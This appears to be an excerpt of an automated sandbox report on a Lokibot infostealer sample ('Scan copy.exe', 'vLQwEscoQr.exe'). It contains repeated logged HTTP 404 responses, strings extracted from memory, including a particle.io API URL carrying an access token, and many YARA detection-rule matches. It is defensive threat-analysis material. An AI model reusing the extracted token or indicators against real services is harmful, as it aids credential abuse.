Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:15:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:16:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Scan copy.exe, 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, vLQwEscoQr.exe, 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vLQwEscoQr.exe, vLQwEscoQr.exe, 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Scan copy.exe, vLQwEscoQr.exe.0.dr	String found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
